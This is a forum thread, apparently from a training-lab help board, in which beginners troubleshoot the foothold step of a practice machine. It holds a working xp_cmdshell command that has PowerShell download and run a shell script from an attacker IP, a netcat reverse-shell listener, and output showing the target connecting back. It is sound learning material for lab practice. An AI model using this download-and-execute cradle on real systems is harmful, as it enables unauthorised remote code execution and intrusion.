Starting Point Machine - Foothold Section

Good morning all.

Bit of a noob here I’m afraid.

Gone through the process of getting to this section and I'm a bit stumped on what is happening/what to do next.

I’ve run the command:
xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.47/shell.ps1')"

along with

nc -lvnp 443

Nothing then seems to happen. It's as though the xp_cmdshell is waiting for a command or the nc command is waiting for an input.

To my knowledge I believe that the ps1 file is in the correct location having checked the localhost:80 listings.

TIA :slight_smile:

Your command is hitting http, which is port 80, but you're listening on 443, which is https.

Thank you HcKy

I’ve added :443 at the end of the ip address as mentioned above and I get the following:

Exception calling "DownloadString" with "1" argument(s): "The operation has timed out"
At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.47:443
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

For netcat I get (which is more than I had earlier :smile: ):

listening on [any] 443 …
connect to [10.10.14.47] from (UNKNOWN) [10.10.10.27] 49914
GET /shell.ps1 HTTP/1.1
Host: 10.10.14.47:443
Connection: Keep-Alive

Then it drops out when the timeout error comes back.

Where did you save the shell.ps1 file?

By the way, I'm using Windows PowerShell :slight_smile:

I'm having the exact same issue, with the exact same outputs and everything. Adding :443 to the command progressed mine as well. If kmarshallsay's setup is like mine, the shell.ps1 file is in the home directory ~/. I'm running Kali Linux.

I figured it out on my end: I didn't modify the script to point to my IP :confused: